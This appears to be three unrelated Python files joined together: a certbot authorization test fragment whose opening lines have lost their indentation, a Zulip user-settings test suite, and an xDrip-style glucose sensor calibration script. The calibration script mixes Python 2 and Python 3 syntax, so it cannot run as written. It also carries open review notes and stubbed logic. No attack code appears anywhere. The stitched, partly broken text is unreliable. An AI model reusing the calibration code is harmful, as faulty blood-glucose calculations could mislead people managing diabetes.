self.assertTrue(self._call(challbs, prefs, None))
# Rearrange order...
self.assertEqual(self._call(challbs[::-1], prefs, combos), (1,))
self.assertTrue(self._call(challbs[::-1], prefs, None))
def test_not_supported(self):
challbs = (acme_util.DNS_P, acme_util.TLSSNI01_P)
prefs = [challenges.TLSSNI01]
combos = ((0, 1),)
# smart path fails because no challs in perfs satisfies combos
self.assertRaises(
errors.AuthorizationError, self._call, challbs, prefs, combos)
# dumb path fails because all challbs are not supported
self.assertRaises(
errors.AuthorizationError, self._call, challbs, prefs, None)
class ReportFailedChallsTest(unittest.TestCase):
    """Tests for certbot.auth_handler._report_failed_challs."""
    # pylint: disable=protected-access

    def setUp(self):
        kwargs = {
            "chall": acme_util.HTTP01,
            "uri": "uri",
            "status": messages.STATUS_INVALID,
            "error": messages.Error(typ="urn:acme:error:tls", detail="detail"),
        }

        # Prevent future regressions if the error type changes
        self.assertTrue(kwargs["error"].description is not None)

        # Same domain and same error as tls_sni_same below.
        self.http01 = achallenges.KeyAuthorizationAnnotatedChallenge(
            # pylint: disable=star-args
            challb=messages.ChallengeBody(**kwargs),
            domain="example.com",
            account_key="key")

        kwargs["chall"] = acme_util.TLSSNI01
        self.tls_sni_same = achallenges.KeyAuthorizationAnnotatedChallenge(
            # pylint: disable=star-args
            challb=messages.ChallengeBody(**kwargs),
            domain="example.com",
            account_key="key")

        # Different error and different domain from the two above.
        kwargs["error"] = messages.Error(typ="dnssec", detail="detail")
        self.tls_sni_diff = achallenges.KeyAuthorizationAnnotatedChallenge(
            # pylint: disable=star-args
            challb=messages.ChallengeBody(**kwargs),
            domain="foo.bar",
            account_key="key")

    @mock.patch("certbot.auth_handler.zope.component.getUtility")
    def test_same_error_and_domain(self, mock_zope):
        from certbot import auth_handler

        # Identical error + domain pairs should be merged into one message.
        auth_handler._report_failed_challs([self.http01, self.tls_sni_same])
        call_list = mock_zope().add_message.call_args_list
        self.assertTrue(len(call_list) == 1)
        self.assertTrue("Domain: example.com\nType: tls\nDetail: detail" in call_list[0][0][0])

    @mock.patch("certbot.auth_handler.zope.component.getUtility")
    def test_different_errors_and_domains(self, mock_zope):
        from certbot import auth_handler

        auth_handler._report_failed_challs([self.http01, self.tls_sni_diff])
        self.assertTrue(mock_zope().add_message.call_count == 2)
def gen_auth_resp(chall_list):
    """Generate a dummy authorization response."""
    responses = []
    for chall in chall_list:
        responses.append("%s%s" % (chall.__class__.__name__, chall.domain))
    return responses
def gen_dom_authzr(domain, unused_new_authzr_uri, challs, combos=True):
    """Generates new authzr for domains."""
    statuses = [messages.STATUS_PENDING] * len(challs)
    return acme_util.gen_authzr(
        messages.STATUS_PENDING, domain, challs, statuses, combos)
if __name__ == "__main__":
    # Run the test suite when executed directly.
    unittest.main()  # pragma: no cover
|
|
from __future__ import absolute_import
from __future__ import print_function
import ujson
from django.http import HttpResponse
from mock import patch
from typing import Any, Dict
from zerver.lib.initial_password import initial_password
from zerver.lib.sessions import get_session_dict_user
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import get_user_profile_by_email
class ChangeSettingsTest(ZulipTestCase):
    """Tests for the /json/settings/* user-settings endpoints."""

    def check_well_formed_change_settings_response(self, result):
        # type: (Dict[str, Any]) -> None
        self.assertIn("full_name", result)

    # DEPRECATED, to be deleted after all uses of check_for_toggle_param
    # are converted into check_for_toggle_param_patch.
    def check_for_toggle_param(self, pattern, param):
        # type: (str, str) -> None
        # Toggle `param` on and then off via POST, verifying the new value is
        # persisted each time.
        self.login("hamlet@zulip.com")
        user_profile = get_user_profile_by_email("hamlet@zulip.com")

        json_result = self.client_post(pattern,
                                       {param: ujson.dumps(True)})
        self.assert_json_success(json_result)
        # refetch user_profile object to correctly handle caching
        user_profile = get_user_profile_by_email("hamlet@zulip.com")
        self.assertEqual(getattr(user_profile, param), True)

        json_result = self.client_post(pattern,
                                       {param: ujson.dumps(False)})
        self.assert_json_success(json_result)
        # refetch user_profile object to correctly handle caching
        user_profile = get_user_profile_by_email("hamlet@zulip.com")
        self.assertEqual(getattr(user_profile, param), False)

    # TODO: requires method consolidation, right now, there's no alternative
    # for check_for_toggle_param for PATCH.
    def check_for_toggle_param_patch(self, pattern, param):
        # type: (str, str) -> None
        # Same as check_for_toggle_param, but uses the PATCH verb.
        self.login("hamlet@zulip.com")
        user_profile = get_user_profile_by_email("hamlet@zulip.com")

        json_result = self.client_patch(pattern,
                                        {param: ujson.dumps(True)})
        self.assert_json_success(json_result)
        # refetch user_profile object to correctly handle caching
        user_profile = get_user_profile_by_email("hamlet@zulip.com")
        self.assertEqual(getattr(user_profile, param), True)

        json_result = self.client_patch(pattern,
                                        {param: ujson.dumps(False)})
        self.assert_json_success(json_result)
        # refetch user_profile object to correctly handle caching
        user_profile = get_user_profile_by_email("hamlet@zulip.com")
        self.assertEqual(getattr(user_profile, param), False)

    def test_successful_change_settings(self):
        # type: () -> None
        """
        A call to /json/settings/change with valid parameters changes the user's
        settings correctly and returns correct values.
        """
        self.login("hamlet@zulip.com")
        json_result = self.client_post(
            "/json/settings/change",
            dict(
                full_name='Foo Bar',
                old_password=initial_password('hamlet@zulip.com'),
                new_password='foobar1',
                confirm_password='foobar1',
            ))
        self.assert_json_success(json_result)
        result = ujson.loads(json_result.content)
        self.check_well_formed_change_settings_response(result)
        self.assertEqual(get_user_profile_by_email("hamlet@zulip.com").
                         full_name, "Foo Bar")
        # The new password must now work for login.
        self.client_post('/accounts/logout/')
        self.login("hamlet@zulip.com", "foobar1")
        user_profile = get_user_profile_by_email('hamlet@zulip.com')
        self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)

    def test_illegal_name_changes(self):
        # type: () -> None
        email = 'hamlet@zulip.com'
        self.login(email)
        user = get_user_profile_by_email(email)
        full_name = user.full_name

        with self.settings(NAME_CHANGES_DISABLED=True):
            json_result = self.client_post("/json/settings/change",
                                           dict(full_name='Foo Bar'))

        # We actually fail silently here, since this only happens if
        # somebody is trying to game our API, and there's no reason to
        # give them the courtesy of an error reason.
        self.assert_json_success(json_result)

        user = get_user_profile_by_email(email)
        self.assertEqual(user.full_name, full_name)

        # Now try a too-long name
        json_result = self.client_post("/json/settings/change",
                                       dict(full_name='x' * 1000))
        self.assert_json_error(json_result, 'Name too long!')

    def test_illegal_characters_in_name_changes(self):
        # type: () -> None
        email = 'hamlet@zulip.com'
        self.login(email)

        # Now try a name with invalid characters
        json_result = self.client_post("/json/settings/change",
                                       dict(full_name='Opheli*'))
        self.assert_json_error(json_result, 'Invalid characters in name!')

    # This is basically a don't-explode test.
    def test_notify_settings(self):
        # type: () -> None
        self.check_for_toggle_param_patch("/json/settings/notifications", "enable_desktop_notifications")
        self.check_for_toggle_param_patch("/json/settings/notifications", "enable_stream_desktop_notifications")
        self.check_for_toggle_param_patch("/json/settings/notifications", "enable_stream_sounds")
        self.check_for_toggle_param_patch("/json/settings/notifications", "enable_sounds")
        self.check_for_toggle_param_patch("/json/settings/notifications", "enable_offline_email_notifications")
        self.check_for_toggle_param_patch("/json/settings/notifications", "enable_offline_push_notifications")
        self.check_for_toggle_param_patch("/json/settings/notifications", "enable_online_push_notifications")
        self.check_for_toggle_param_patch("/json/settings/notifications", "enable_digest_emails")
        self.check_for_toggle_param_patch("/json/settings/notifications", "pm_content_in_desktop_notifications")

    def test_ui_settings(self):
        # type: () -> None
        self.check_for_toggle_param_patch("/json/settings/ui", "autoscroll_forever")
        self.check_for_toggle_param_patch("/json/settings/ui", "default_desktop_notifications")

    def test_toggling_left_side_userlist(self):
        # type: () -> None
        self.check_for_toggle_param_patch("/json/settings/display", "left_side_userlist")

    def test_toggling_emoji_alt_code(self):
        # type: () -> None
        self.check_for_toggle_param_patch("/json/settings/display", "emoji_alt_code")

    def test_time_setting(self):
        # type: () -> None
        self.check_for_toggle_param_patch("/json/settings/display", "twenty_four_hour_time")

    def test_enter_sends_setting(self):
        # type: () -> None
        self.check_for_toggle_param('/json/users/me/enter-sends', "enter_sends")

    def test_mismatching_passwords(self):
        # type: () -> None
        """
        new_password and confirm_password must match
        """
        self.login("hamlet@zulip.com")
        result = self.client_post(
            "/json/settings/change",
            dict(
                new_password="mismatched_password",
                confirm_password="not_the_same",
            ))
        self.assert_json_error(result,
                               "New password must match confirmation password!")

    def test_wrong_old_password(self):
        # type: () -> None
        """
        A password change must be rejected when old_password is wrong.
        """
        self.login("hamlet@zulip.com")
        result = self.client_post(
            "/json/settings/change",
            dict(
                old_password='bad_password',
                new_password="ignored",
                confirm_password="ignored",
            ))
        self.assert_json_error(result, "Wrong password!")

    def test_changing_nothing_returns_error(self):
        # type: () -> None
        """
        We need to supply at least one non-empty parameter
        to this API, or it should fail.  (Eventually, we should
        probably use a patch interface for these changes.)
        """
        self.login("hamlet@zulip.com")
        result = self.client_post("/json/settings/change",
                                  dict(old_password='ignored',))
        self.assert_json_error(result, "No new data supplied")

    def test_change_default_language(self):
        # type: () -> None
        """
        Test changing the default language of the user.
        """
        email = "hamlet@zulip.com"
        self.login(email)
        german = "de"
        data = dict(default_language=ujson.dumps(german))
        result = self.client_patch("/json/settings/display", data)
        self.assert_json_success(result)
        user_profile = get_user_profile_by_email(email)
        self.assertEqual(user_profile.default_language, german)

        # Test to make sure invalid languages are not accepted
        # and saved in the db.
        invalid_lang = "invalid_lang"
        data = dict(default_language=ujson.dumps(invalid_lang))
        result = self.client_patch("/json/settings/display", data)
        self.assert_json_error(result, "Invalid language '%s'" % (invalid_lang,))
        user_profile = get_user_profile_by_email(email)
        self.assertNotEqual(user_profile.default_language, invalid_lang)
class UserChangesTest(ZulipTestCase):
    """Tests for user-level account changes (API key regeneration)."""

    def test_update_api_key(self):
        # type: () -> None
        email = "hamlet@zulip.com"
        self.login(email)
        user = get_user_profile_by_email(email)
        old_api_key = user.api_key

        result = self.client_post('/json/users/me/api_key/regenerate')
        self.assert_json_success(result)

        new_api_key = ujson.loads(result.content)['api_key']
        self.assertNotEqual(old_api_key, new_api_key)

        # The key returned by the endpoint must match what is now stored.
        user = get_user_profile_by_email(email)
        self.assertEqual(new_api_key, user.api_key)
|
|
#!/usr/bin/python
import json
import socket
import sys
import time
import os
import array
import math
#import BGReadings
import sensor
from calibration import *
from linreg import *
BESTOFFSET = (60000 * 0) # Assume readings are about x minutes off from actual!
def getTimeDelta(BRReading, CurSensor):
    """Hours elapsed between a BG reading and the sensor start (both in ms)."""
    elapsed_ms = (BRReading.timestamp - CurSensor['started_at']) * 1.0
    return elapsed_ms / 1000 / 60 / 60
##########################################################
# calculateAgeAdjustedRawValue(hourssince, raw_data)
# Scales a raw sensor value up to compensate for sensor age.
#
def calculateAgeAdjustedRawValue(hourssince, raw_data):
    """Return the age-adjusted raw value.

    For the first ~1.9 days of sensor life the raw signal is boosted by up to
    45%, decaying linearly to no adjustment afterwards.
    """
    # Remaining "young sensor" time in ms: 1.9 days minus the elapsed hours.
    adjust_for = (86400000 * 1.9) - (hourssince * 60 * 60 * 1000)
    if adjust_for <= 0:
        return raw_data
    return (((.45) * (adjust_for / (86400000 * 1.9))) * raw_data) + raw_data
##########################################################
# calcCGMVAL(slope, intercept, raw_data)
# Calculate the CGM value from RAW:
# needs the calibration slope/intercept and the raw value,
# gives back the calibration-corrected BG.
def calcCGMVAL(slope, intercept, raw_data):
    """Return calibrated BG: slope * (raw_data / 1000) + intercept.

    FIX: the Python-2-only `print` statements were rewritten as
    parenthesized single-argument calls -- identical output under Python 2,
    and valid syntax under Python 3.
    """
    print("(calcCGMVAL) xdrip raw_data -> " + str(raw_data / 1000))
    print("(calcCGMVAL) xdrip slope -> " + str(slope))
    print("(calcCGMVAL) xdrip intercept -> " + str(intercept))
    bg = (((slope * 1.0)) * (raw_data * 1.0 / 1000)) + (intercept * 1.0)
    print("(calcCGMVAL) xdrip BG -> " + str(bg))
    return bg
# //*******INSTANCE METHODS***********//
def perform_calculations():
    """Recompute the BG curve, the raw curve and the slope for the latest reading."""
    find_new_curve()
    find_new_raw_curve()
    find_slope()
def find_slope():
    """Compute calculated_value_slope for the latest BG reading and persist it.

    The slope is the BG change per millisecond between the two most recent
    readings; with fewer than two readings it falls back to 0.
    """
    latest = BGReadings_Data()
    latest.getlatest()
    second_latest = BGReadings_Data()
    second_latest.getsecondlatest()
    # NOTE(review): both objects are freshly constructed above, so they are
    # never literally None; presumably the get*latest() calls are expected to
    # signal "no data" somehow -- confirm against BGReadings_Data.
    if second_latest != None:
        y1 = latest.bg
        x1 = latest.timestamp
        y2 = second_latest.bg
        x2 = second_latest.timestamp
        if y1 == y2:
            latest.calculated_value_slope = 0
        else:
            latest.calculated_value_slope = (y2 - y1) / (x2 - x1)
        latest.write2db()
    # BUG FIX: this used to be a second independent `if`, which
    # unconditionally overwrote the slope computed above with 0.  As an elif
    # the zero-slope fallback only applies when there is no second reading.
    elif latest != None:
        latest.calculated_value_slope = 0
        latest.write2db()
    else:
        print("NO BG? COULDNT FIND SLOPE!")
def find_new_curve():
    """Fit a curve through the last three calibrated BG readings.

    Stores the coefficients on the latest reading (a, b, c for
    bg = a*t^2 + b*t + c, t in ms) and persists them.  Falls back to a line
    with two usable readings and to a constant otherwise.
    """
    latest = BGReadings_Data()
    latest.getlatest()
    secondlatest = BGReadings_Data()
    secondlatest.getsecondlatest()
    thirdlatest = BGReadings_Data()
    thirdlatest.getthirdlatest()
    print("->" + str(thirdlatest.bg) + " " + str(secondlatest.bg) + " " + str(latest.bg))
    if (thirdlatest.bg != 0 and secondlatest.bg != 0 and latest.bg != 0):
        # Lagrange interpolation of the parabola through the three points.
        y3 = latest.bg
        x3 = latest.timestamp
        y2 = secondlatest.bg
        x2 = secondlatest.timestamp
        y1 = thirdlatest.bg
        x1 = thirdlatest.timestamp
        print("find_new_curve latest.bg ->" + str(y3))
        print("find_new_curve latest.timestamp ->" + str(x3))
        print("find_new_curve 2latest.bg ->" + str(y2))
        print("find_new_curve 2latest.timestamp ->" + str(x2))
        print("find_new_curve 3latest.bg ->" + str(y1))
        print("find_new_curve 3latest.timestamp ->" + str(x1))
        a = y1/((x1-x2)*(x1-x3)) + y2/((x2-x1)*(x2-x3)) + y3/((x3-x1)*(x3-x2))
        b = (-y1*(x2+x3) / ((x1-x2)*(x1-x3)) - y2*(x1+x3)/((x2-x1)*(x2-x3)) - y3*(x1+x2)/((x3-x1)*(x3-x2)))
        c = (y1*x2*x3/((x1-x2)*(x1-x3)) + y2*x1*x3/((x2-x1)*(x2-x3)) + y3*x1*x2/((x3-x1)*(x3-x2)))
    # BUG FIX: the linear fallback previously tested thirdlatest/secondlatest
    # but then used latest/secondlatest in its body; test the two readings
    # that are actually used (this mirrors find_new_raw_curve).
    elif (secondlatest.bg != 0 and latest.bg != 0):
        print("Not enough data to calculate parabolic rates - assume Linear")
        y2 = latest.bg
        x2 = latest.timestamp
        y1 = secondlatest.bg
        x1 = secondlatest.timestamp
        if y1 == y2 or x1 == x2:
            b = 0
        else:
            b = (y2 - y1)/(x2 - x1)
        a = 0
        # BUG FIX: was `latest.b`, a stale attribute not yet assigned in this
        # call -- the local slope `b` just computed is what the intercept
        # needs (mirrors first_latest.rb usage in find_new_raw_curve).
        c = -1 * ((b * x1) - y1)
    else:
        print("Not enough data to calculate parabolic rates - assume static data")
        a = 0
        b = 0
        c = latest.bg
    print("" + str(a) + "x^2 + " + str(b) + "x + " + str(c))
    print("(find_new_curve) BG PARABOLIC RATES: " + str(a) + "x^2 + " + str(b) + "x + " + str(c))
    latest.a = a
    latest.b = b
    latest.c = c
    latest.write2db()
def estimated_bg(timestamp):
    """Evaluate the fitted BG parabola at `timestamp` (ms), shifted by BESTOFFSET."""
    t = timestamp + BESTOFFSET
    latest = BGReadings_Data()
    latest.getlatest()
    # NOTE: latest is freshly constructed, so this guard only fires if
    # BGReadings_Data() itself can yield None -- kept for parity.
    if latest == None:
        return 0
    return (latest.a * t * t) + (latest.b * t) + latest.c
def estimated_raw_bg(timestamp):
    """Evaluate the fitted raw-value parabola at `timestamp` (ms), shifted by BESTOFFSET."""
    timestamp = timestamp + BESTOFFSET
    estimate = 0
    latest = BGReadings_Data()
    latest.getlatest()
    if (latest == None):
        # BUG FIX: this branch still contained the Java logging call
        # `Log.i(TAG, ...)` left over from the xDrip port; neither `Log` nor
        # `TAG` exists here, so reaching it raised NameError.
        print("No data yet, assume perfect!")
        estimate = 160
    else:
        estimate = (latest.ra * timestamp * timestamp) + (latest.rb * timestamp) + latest.rc
    print("ESTIMATE RAW BG" + str(estimate))
    return estimate
def find_new_raw_curve():
    # Fit a parabola (ra, rb, rc) through the age-adjusted raw values of the
    # last three readings and persist the coefficients on the latest reading.
    # Falls back to a line (two readings) or a constant value (fewer).
    CurSensor=sensor.currentSensor()
    first_latest = BGReadings_Data()
    first_latest.getlatest()
    second_latest = BGReadings_Data()
    second_latest.getsecondlatest()
    third_latest = BGReadings_Data()
    third_latest.getthirdlatest()
    if third_latest.raw_value<>0:
        # NOTE(review): this branch scales the adjusted raw values by /1000
        # but the two-reading branch below does not -- looks inconsistent;
        # confirm which scale the stored ra/rb/rc are expected to use.
        y3 = 1.0 * calculateAgeAdjustedRawValue(getTimeDelta(first_latest,CurSensor),first_latest.raw_value)/1000
        x3 = first_latest.timestamp;
        y2 = calculateAgeAdjustedRawValue(getTimeDelta(second_latest,CurSensor),second_latest.raw_value)/1000;
        x2 = second_latest.timestamp;
        y1 = calculateAgeAdjustedRawValue(getTimeDelta(third_latest,CurSensor),third_latest.raw_value)/1000;
        x1 = third_latest.timestamp;
        print "x1->" + str(x1) + ", y1->" +str(y1) + ", "
        print "x2->" + str(x2) + ", y2->" +str(y2) + ", "
        print "x3->" + str(x3) + ", y3->" +str(y3) + ", "
        # Lagrange interpolation of the parabola through the three points.
        first_latest.ra = y1/((x1-x2)*(x1-x3))+y2/((x2-x1)*(x2-x3))+y3/((x3-x1)*(x3-x2));
        first_latest.rb = (-y1*(x2+x3)/((x1-x2)*(x1-x3))-y2*(x1+x3)/((x2-x1)*(x2-x3))-y3*(x1+x2)/((x3-x1)*(x3-x2)));
        first_latest.rc = (y1*x2*x3/((x1-x2)*(x1-x3))+y2*x1*x3/((x2-x1)*(x2-x3))+y3*x1*x2/((x3-x1)*(x3-x2)));
        print "RAW PARABOLIC RATES: "+str(first_latest.ra)+"x^2 + "+str(first_latest.rb)+"x + "+str(first_latest.rc)
        first_latest.write2db();
    elif second_latest.raw_value<>0:
        # Linear fallback through the two most recent readings.
        y2 = calculateAgeAdjustedRawValue(getTimeDelta(first_latest,CurSensor),first_latest.raw_value);
        x2 = first_latest.timestamp;
        y1 = calculateAgeAdjustedRawValue(getTimeDelta(second_latest,CurSensor),second_latest.raw_value);
        x1 = second_latest.timestamp;
        if y1 == y2:
            first_latest.rb = 0;
        else:
            first_latest.rb = (y2 - y1)/(x2 - x1);
        first_latest.ra = 0;
        first_latest.rc = -1 * ((first_latest.rb * x1) - y1);
        print "Not enough data to calculate parabolic rates - assume Linear data"
        print "RAW PARABOLIC RATES: "+str(first_latest.ra)+"x^2 + "+str(first_latest.rb)+"x + "+str(first_latest.rc)
        first_latest.write2db();
    else:
        # Static fallback: constant value.
        first_latest.ra = 0;
        first_latest.rb = 0;
        first_latest.rc = first_latest.age_adjusted_raw_value;
        print "Not enough data to calculate parabolic rates - assume static data"
        print "RAW PARABOLIC RATES: "+str(first_latest.ra)+"x^2 + "+str(first_latest.rb)+"x + "+str(first_latest.rc)
        first_latest.write2db();
def weightedAverageRaw(timeA, timeB, calibrationTime, rawA, rawB):
    """Linearly interpolate/extrapolate the raw value at `calibrationTime`.

    Fits the line through (timeA, rawA) and (timeB, rawB), then evaluates it
    at calibrationTime.
    """
    relativeSlope = (rawB - rawA) / (timeB - timeA)
    relativeIntercept = rawA - (relativeSlope * timeA)
    return (relativeSlope * calibrationTime) + relativeIntercept
def ___calcCGMVAL(slope, BG_raw, intercept):
    """Legacy variant of calcCGMVAL that also age-adjusts the raw value.

    NOTE(review): the argument order differs from calcCGMVAL and the slope is
    divided by 1000 here; apparently kept only for reference -- confirm
    before using.  FIX: Python-2-only `print` statements rewritten as
    parenthesized single-argument calls (same py2 output, valid py3 syntax).
    """
    raw_data = calculateAgeAdjustedRawValue(66, BG_raw)  # assumes ~66h sensor age
    bg = (((slope * 1.0) / 1000) * (raw_data * 1.0 / 1000)) + (intercept * 1.0)
    print("xdrip raw_data ->" + str(raw_data / 1000))
    print("xdrip slope ->" + str(slope / 1000))
    print("xdrip intercept ->" + str(intercept))
    print("xdrip BG ->" + str(bg))
    return bg
def slopeOOBHandler(status):
    """Fallback slope when the calibration slope is out of bounds.

    `status` distinguishes the out-of-bounds direction (0 = low, 1 = high).
    The full xDrip logic -- choosing a slope from the recent calibrations of
    the sensor depending on `status` -- was never ported (it survives only as
    commented-out pseudo-code in the history); a conservative constant is
    returned instead.  "If the last slope was reasonable and reasonably
    close, use that, otherwise use a slope that may be a little steep, but
    its best to play it safe when uncertain."
    """
    return 1.08
def calculateWeight(sensor_age_at_time_of_estimation,slope_confidence,sensor_confidence):
        # Weight a calibration point for the weighted-least-squares fit.
        # Calibrations closer to the latest calibration (relative to the span
        # between the first and the latest calibration of this sensor) and
        # with higher confidence values get a larger weight; result >= 1.
        calibration=calibration_Data()
        calibration.getfirst()
        firstTimeStarted = calibration.sensor_age_at_time_of_estimation
        calibration.getlatest()
        lastTimeStarted = calibration.sensor_age_at_time_of_estimation;
        print "(calculateWeight) lastTimeStarted->" + str(lastTimeStarted) + " firstTimeStarted " + str(firstTimeStarted)
        print "(calculateWeight) sensor_age_at_time_of_estimation " + str(sensor_age_at_time_of_estimation)
        # NOTE(review): several variants of this weighting exist in the
        # original xDrip sources (was: "HMM irgendwie gibt es da verschiedene
        # Versionen") -- confirm which one is intended.
        if (sensor_age_at_time_of_estimation<>firstTimeStarted and (lastTimeStarted - firstTimeStarted) > 0):
                # Position of this calibration within the overall calibration
                # time span, stretched by 1/0.85 and capped at 1.
                time_percentage = min(((sensor_age_at_time_of_estimation - firstTimeStarted) / (lastTimeStarted - firstTimeStarted)) / (.85), 1);
        else:
                time_percentage=1
        time_percentage = (time_percentage + .01);
        print "(calculateWeight) CALIBRATIONS TIME PERCENTAGE WEIGHT: " + str(time_percentage)
        print "slope_confidence ->" + str(slope_confidence)
        print "sensor_confidence ->" + str(sensor_confidence)
        print "(calculateWeight) CALIBRATIONS WEIGHT: " + str(max((((((slope_confidence + sensor_confidence) * (time_percentage))) / 2) * 100), 1))
        return max((((((slope_confidence + sensor_confidence) * (time_percentage))) / 2) * 100), 1);
        #return 100.0
def calculate_w_l_s():
        # Fit bg vs. raw over the calibrations of the last four days via the
        # linregression helper and store the result in calibration.slope /
        # calibration.intercept, clamping out-of-bounds slopes.
        calibration=calibration_Data()
        calibration.getlatest()
        if calibration.sensorid<>0:
                x_RAW=0.0
                y_BG=0.0
                lreg = linregression()
                calibrations = calibration.allForSensorInLastFourDays() # 5 days was a bit much, dropped this to 4
                # NOTE(review): this branch should normally be unreachable --
                # the initial calibration already creates two records (was a
                # German comment noting the same).
                if (len(calibrations) == 1):
                        calibration.slope = 1;
                        calibration.intercept = calibration.bg - (calibration.raw_value * calibration.slope);
                else:
                        for c in calibrations:
                                # Row layout -- TODO confirm against schema:
                                # c[2]=sensor age, c[4]=bg, c[8]=sensor
                                # confidence, c[9]=slope confidence,
                                # c[14]=raw value (millis-scaled).
                                sensor_age_at_time_of_estimation=c[2]
                                y_BG=c[4]
                                sensor_confidence=c[8]
                                slope_confidence=c[9]
                                x_Raw=c[14]/1000
                                print "y_BG ->" + str(y_BG)
                                print "x_Raw ->" + str(x_Raw)
                                # NOTE(review): the computed weight is unused;
                                # every point is fed to the regression with a
                                # fixed weight of 100 -- confirm intent.
                                weight = calculateWeight(sensor_age_at_time_of_estimation,slope_confidence,sensor_confidence);
                                lreg.newval(x_Raw,y_BG,100)
                        last_calibration = calibration_Data()
                        last_calibration.getlatest()
                        #w = ( calculateWeight(last_calibration.sensor_age_at_time_of_estimation,last_calibration.slope_confidence,last_calibration.sensor_confidence) * (len(c) * 0.14));
                calibration.intercept = lreg.intercept ;
                calibration.slope = lreg.slope;
                print "(1) Calculated Calibration Slope: " + str(calibration.slope)
                print "(1) Calculated Calibration intercept: " + str(calibration.intercept)
                # Clamp out-of-bounds slopes (was a German TODO calling this
                # one of the most interesting parts of the algorithm).
                if 1==1:
                        if ((len(calibrations) == 2 and calibration.slope < 0.90) or (calibration.slope < 0.85)):
                                # I have not seen a case where a value below 7.5 proved to be accurate but we should keep an eye on this
                                calibration.slope = slopeOOBHandler(0);
                                if(len(calibrations) > 2):
                                        calibration.possible_bad = True
                                print "calibration.bg-> " + str(calibration.bg)
                                print "calibration.estimate_raw_at_time_of_calibration -> " + str(calibration.estimate_raw_at_time_of_calibration)
                                print "calibration.slope -> " + str(calibration.slope)
                                calibration.intercept = calibration.bg - ((calibration.estimate_raw_at_time_of_calibration*1.0/1000) * calibration.slope)
                                # CalibrationRequest.createOffset(calibration.bg, 25);
                        if ((len(calibrations) == 2 and calibration.slope > 1.3) or (calibration.slope > 1.4)):
                                calibration.slope = slopeOOBHandler(1);
                                if(len(calibrations) > 2):
                                        calibration.possible_bad = True
                                print "(calibration.bg) ->" + str(calibration.bg)
                                # NOTE(review): estimate_raw_at_time_of_calibration
                                # has been observed to be zero here (was: "Hier
                                # ist eine Null drin !!!!").
                                print "(calibration.estimate_raw_at_time_of_calibration) ->" + str(calibration.estimate_raw_at_time_of_calibration)
                                print "(calibration.slope) ->" + str(calibration.slope)
                                calibration.intercept = calibration.bg - ((calibration.estimate_raw_at_time_of_calibration*1.0/1000) * calibration.slope)
                                # CalibrationRequest.createOffset(calibration.bg, 25);
                print "(2) Calculated Calibration Slope: " + str(calibration.slope)
                print "(2) Calculated Calibration intercept: " + str(calibration.intercept)
                calibration.save();
        else:
                print "NO Current active sensor found!!"
def create(bg):
        # Create a calibration record from an operator-entered blood-glucose
        # value ``bg``, pair it with the most recent BG reading, persist both,
        # and re-fit the calibration curve via calculate_w_l_s().
        calibration = calibration_Data();
        #sens = sensor();
        bgReading=BGReadings_Data()
        bgReadingsec=BGReadings_Data()
        if (sensor.SensorisActive()):
                sens = sensor.currentSensor()
                bgReading.getlatest()
                bgReadingsec.getsecondlatest()
                if (bgReading._id <> 0):
                        calibration.sensor = sensor;
                        calibration.bg = bg;
                        calibration.check_in = False;
                        # Millisecond epoch timestamp (seconds + "000").
                        calibration.timestamp = long(str(int(time.time()))+"000")
                        calibration.raw_value = bgReading.raw_value;
                        calibration.age_adjusted_raw_value = bgReading.age_adjusted_raw_value;
                        calibration.sensor_uuid = "Sensor_uuid";
                        print "(create) bgReading.bg -> " + str(bgReading.bg)
                        print "(create) bgReadingsec.bg -> " + str(bgReadingsec.bg)
                        print "(create) abs(bgReading.bg - bgReadingsec.bg) -> " + str(abs(bgReading.bg - bgReadingsec.bg))
                        # NOTE(review): this first slope_confidence value is
                        # immediately overwritten two lines below -- confirm
                        # which formula is intended.
                        calibration.slope_confidence = min(max((( 4 - (abs(bgReading.bg - bgReadingsec.bg) * 60000))/4), 0), 1);
                        print "(create) calibration.slope_confidence -> " + str(calibration.slope_confidence )
                        calibration.slope_confidence = (100-abs(bgReading.bg - bgReadingsec.bg))/100
                        print "(create) calibration.slope_confidence -> " + str(calibration.slope_confidence )
                        estimated_raw_bg_value = estimated_raw_bg(long(str(int(time.time()))+"000"));
                        calibration.raw_timestamp = bgReading.timestamp;
                        print "(create) estimated_raw_bg_value ->" + str(estimated_raw_bg_value)
                        print "(create) bgReading.age_adjusted_raw_value ->" + str(bgReading.age_adjusted_raw_value)
                        # Prefer the estimated raw value only when it is close
                        # (within 20) to the age-adjusted raw value.
                        if (abs(estimated_raw_bg_value - bgReading.age_adjusted_raw_value) > 20):
                                print "create(bg) bgReading.age_adjusted_raw_value ->" + str(bgReading.age_adjusted_raw_value)
                                calibration.estimate_raw_at_time_of_calibration = bgReading.age_adjusted_raw_value
                        else:
                                print "create(bg)estimated_raw_bg_value ->" + str(estimated_raw_bg_value)
                                calibration.estimate_raw_at_time_of_calibration = estimated_raw_bg_value
                        calibration.distance_from_estimate = abs(calibration.bg - bgReading.bg);
                        # Sensor confidence: downward parabola in bg, clamped at 0.
                        calibration.sensor_confidence = max(((-0.0018 * bg * bg) + (0.6657 * bg) + 36.7505) / 100, 0);
                        calibration.sensor_age_at_time_of_estimation = calibration.timestamp - sens['started_at'];
                        calibration.uuid = "CalUUI"
                        calibration.save();
                        bgReading.calibration = calibration;
                        bgReading.calibration_flag = True;
                        bgReading.write2db();
                        #BgSendQueue.handleNewBgReading(bgReading, "update", context);
                        calculate_w_l_s();
                        #adjustRecentBgReadings();
                        #CalibrationSendQueue.addToQueue(calibration, context);
                        #context.startService(new Intent(context, Notifications.class));
                        #Calibration.requestCalibrationIfRangeTooNarrow();
        else:
                print "CALIBRATION", "No sensor, cant save!"
def initialCalibration( bg1, bg2 ):
        # Create the two initial calibration records from the double
        # blood-glucose entry (bg1, bg2): the higher entered value is paired
        # with the BG reading that has the higher raw value, identity slopes
        # are stored, the raw/bg curves are re-fitted and the weighted
        # least-squares calibration is computed.  Returns False when fewer
        # than two BG readings exist yet.
        #calib = calibration_Data()
        #calib.clear_all_existing_calibrations()
        higherCalibration = calibration_Data();
        lowerCalibration = calibration_Data();
        sens = sensor.currentSensor()
        higher_bg = max(bg1, bg2);
        lower_bg = min(bg1, bg2);
        BgReading1=BGReadings_Data()
        BgReading1.getlatest()
        BgReading2=BGReadings_Data()
        BgReading2.getsecondlatest()
        # Two readings are required before an initial calibration can be done.
        if BgReading2.raw_value == None :
                print "(initialCalibration) Hmm benoetige ersteinmal 2 BG Readings"
                return False
